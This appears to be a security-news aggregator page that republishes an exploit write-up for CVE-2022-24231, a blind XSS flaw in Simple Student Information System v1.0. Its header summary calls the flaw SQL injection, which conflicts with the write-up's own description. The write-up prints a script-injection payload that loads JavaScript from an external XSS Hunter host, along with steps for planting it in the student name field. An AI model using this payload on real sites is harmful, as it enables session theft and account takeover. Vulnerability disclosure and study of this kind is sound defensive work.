Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-24231: OpenSource/Blind_XSS at main · nsparker1337/OpenSource

Simple Student Information System v1.0 was discovered to contain a SQL injection vulnerability via add/Student.

CVE
Open in Source
#sql#xss#vulnerability#linux#apache#java

# Exploit Title: Student Information System - Blind XSS

# Exploit Author: NS Kumar (n1_x)

# Vendor Name: oretnom23

# Vendor Homepage: https://www.sourcecodester.com/php/15147/simple-student-information-system-phpoop-free-source-code.html

# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sis_0_1.zip

# Version: v1.0

# Tested on: Parrot GNU/Linux 4.10, Apache

# CVE: ytd

```````````````````````````````````````````Description:`````````````````````````````````````````````````````````

-

A Blind XSS issue in Student Information System v.1.0 allows to inject Arbitrary JavaScript via add /Student.

``````````````````````````````````````````Payload used:`````````````````````````````````````````````````````````

"><script src=https://d4.xss.ht></script>

``````````````````````````````````````Steps to reproduce:``````````````````````````````````````````````````````

1- Go to http://victim.com

2- In “staff portal” option, paste the payload in student first name.

3- Then goto your xss hunter, You will see xss fires alert.

````````````````````````````````````````````````````````````````````````````````````````````````````````````````

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE